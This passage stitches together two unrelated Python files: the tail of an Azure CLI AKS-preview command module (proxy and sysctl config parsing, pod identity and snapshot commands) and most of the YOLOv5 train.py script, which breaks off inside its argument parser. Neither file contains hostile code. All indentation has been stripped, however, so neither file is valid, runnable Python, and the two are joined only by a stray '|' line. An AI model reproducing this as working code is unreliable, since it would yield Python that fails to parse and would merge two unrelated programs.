config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
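# A minimal sketch of an HTTP proxy configuration file accepted by
# _get_http_proxy_config above (hypothetical values; see
# https://aka.ms/HttpProxyConfig for the full schema):
# {
#     "httpProxy": "http://proxy.example.com:3128/",
#     "httpsProxy": "https://proxy.example.com:3129/",
#     "noProxy": ["localhost", "127.0.0.1"],
#     "trustedCa": "<base64-encoded CA certificate>"
# }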
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
    if not resource_group_name:
        return client.list()
return client.list_by_resource_group(resource_group_name)
|
train.py | """Train a YOLOv5 model on a custom dataset
Usage:
$ python path/to/train.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import logging
import os
import random
import sys
import time
import warnings
from copy import deepcopy
from pathlib import Path
from threading import Thread
import math
import numpy as np
import torch
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
import val # for end-of-epoch mAP
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, de_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
from utils.metrics import fitness
LOGGER = logging.getLogger(__name__)
LOCAL_RANK = int(os.getenv('LOCAL_RANK', -1)) # https://pytorch.org/docs/stable/elastic/run.html
RANK = int(os.getenv('RANK', -1))
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1))
def train(hyp, # path/to/hyp.yaml or hyp dictionary
opt,
device,
):
save_dir, epochs, batch_size, weights, single_cls, evolve, data, cfg, resume, noval, nosave, workers, = \
opt.save_dir, opt.epochs, opt.batch_size, opt.weights, opt.single_cls, opt.evolve, opt.data, opt.cfg, \
opt.resume, opt.noval, opt.nosave, opt.workers
# Directories
save_dir = Path(save_dir)
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Hyperparameters
if isinstance(hyp, str):
with open(hyp) as f:
hyp = yaml.safe_load(f) # load hyps dict
LOGGER.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.safe_dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.safe_dump(vars(opt), f, sort_keys=False)
# Configure
plots = not evolve # create plots
cuda = device.type != 'cpu'
init_seeds(1 + RANK)
with open(data) as f:
data_dict = yaml.safe_load(f) # data dict
# Loggers
loggers = {'wandb': None, 'tb': None} # loggers dict
if RANK in [-1, 0]:
# TensorBoard
if not evolve:
prefix = colorstr('tensorboard: ')
LOGGER.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
loggers['tb'] = SummaryWriter(str(save_dir))
# W&B
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
run_id = run_id if opt.resume else None # start fresh run if transfer learning
wandb_logger = WandbLogger(opt, save_dir.stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
if loggers['wandb']:
data_dict = wandb_logger.data_dict
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # may update weights, epochs if resuming
nc = 1 if single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, data) # check
is_coco = data.endswith('coco.yaml') and nc == 80 # COCO dataset
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(RANK):
weights = attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (cfg or hyp.get('anchors')) and not resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
LOGGER.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(RANK):
check_dataset(data_dict) # check
train_path = data_dict['train']
val_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= batch_size * accumulate / nbs # scale weight_decay
LOGGER.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
LOGGER.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
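    # Assuming utils.general.one_cycle implements the cosine interpolation
    # lf(x) = (1 - cos(pi * x / epochs)) / 2 * (lrf - 1) + 1, the LR multiplier
    # decays smoothly from 1 at epoch 0 to hyp['lrf'] at the final epoch.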
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if RANK in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
LOGGER.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz = check_img_size(opt.imgsz, gs, floor=gs * 2) # verify imgsz is gs-multiple
# DP mode
if cuda and RANK == -1 and torch.cuda.device_count() > 1:
logging.warning('DP not recommended, instead use torch.distributed.run for best DDP Multi-GPU results.\n'
'See Multi-GPU Tutorial at https://github.com/ultralytics/yolov5/issues/475 to get started.')
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and RANK != -1:
        raise Exception('cannot train with --sync-bn, known issue https://github.com/ultralytics/yolov5/issues/3998')
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
LOGGER.info('Using SyncBatchNorm()')
# Trainloader
train_loader, dataset = create_dataloader(train_path, imgsz, batch_size // WORLD_SIZE, gs, single_cls,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=RANK,
workers=workers, image_weights=opt.image_weights, quad=opt.quad,
prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(train_loader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, data, nc - 1)
# Process 0
if RANK in [-1, 0]:
val_loader = create_dataloader(val_path, imgsz, batch_size // WORLD_SIZE * 2, gs, single_cls,
hyp=hyp, cache=opt.cache_images and not noval, rect=True, rank=-1,
workers=workers, pad=0.5,
prefix=colorstr('val: '))[0]
if not resume:
labels = np.concatenate(dataset.labels, 0)
# c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and RANK != -1:
model = DDP(model, device_ids=[LOCAL_RANK], output_device=LOCAL_RANK)
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
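    # Worked example with hypothetical numbers: warmup_epochs=3 and nb=500
    # batches/epoch give nw = max(round(3 * 500), 1000) = 1500 warmup iterations.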
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
last_opt_step = -1
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
LOGGER.info(f'Image sizes {imgsz} train, {imgsz} val\n'
f'Using {train_loader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if RANK in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if RANK != -1:
indices = (torch.tensor(dataset.indices) if RANK == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if RANK != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if RANK != -1:
train_loader.sampler.set_epoch(epoch)
pbar = enumerate(train_loader)
LOGGER.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if RANK in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if RANK != -1:
loss *= WORLD_SIZE # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni - last_opt_step >= accumulate:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
last_opt_step = ni
# Print
if RANK in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
f'{epoch}/{epochs - 1}', mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if loggers['tb'] and ni == 0: # TensorBoard
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
loggers['tb'].add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
elif plots and ni == 10 and loggers['wandb']:
wandb_logger.log({'Mosaics': [loggers['wandb'].Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for loggers
scheduler.step()
# DDP process 0 or single-GPU
if RANK in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not noval or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, _ = val.run(data_dict,
batch_size=batch_size // WORLD_SIZE * 2,
imgsz=imgsz,
model=ema.ema,
single_cls=single_cls,
dataloader=val_loader,
save_dir=save_dir,
save_json=is_coco and final_epoch,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if loggers['tb']:
loggers['tb'].add_scalar(tag, x, epoch) # TensorBoard
if loggers['wandb']:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not nosave) or (final_epoch and not evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(de_parallel(model)).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if loggers['wandb'] else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if loggers['wandb']:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training -----------------------------------------------------------------------------------------------------
if RANK in [-1, 0]:
LOGGER.info(f'{epoch - start_epoch + 1} epochs completed in {(time.time() - t0) / 3600:.3f} hours.\n')
if plots:
plot_results(save_dir=save_dir) # save as results.png
if loggers['wandb']:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [loggers['wandb'].Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
if not evolve:
if is_coco: # COCO dataset
for m in [last, best] if best.exists() else [last]: # speed, mAP tests
results, _, _ = val.run(data_dict,
batch_size=batch_size // WORLD_SIZE * 2,
imgsz=imgsz,
model=attempt_load(m, device).half(),
single_cls=single_cls,
dataloader=val_loader,
save_dir=save_dir,
save_json=True,
plots=False)
# Strip optimizers
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if loggers['wandb']: # Log the stripped model
loggers['wandb'].log_artifact(str(best if best.exists() else last), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
wandb_logger.finish_run()
torch.cuda.empty_cache()
return results
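# --- Added sketch (not part of the original YOLOv5 script) ---------------------
# The warmup block inside train() ramps every optimizer param group with
# np.interp over the first nw iterations. A standalone, hypothetical helper
# showing the same curve (the scheduler factor lf(epoch) used in train() is
# omitted here; names are illustrative, not upstream API):
def _warmup_lr_sketch(ni, nw, lr_nominal, warmup_bias_lr=0.1, is_bias_group=False):
    import numpy as np
    start = warmup_bias_lr if is_bias_group else 0.0  # bias lr falls, all other lrs rise
    return float(np.interp(ni, [0, nw], [start, lr_nominal]))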
def parse_opt(known=False):
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyps/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='train, val image size (pixels)')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--noval', action='store_true', help='only validate final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', type=int, nargs='?', const=300, help='evolve hyperparameters for x generations')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
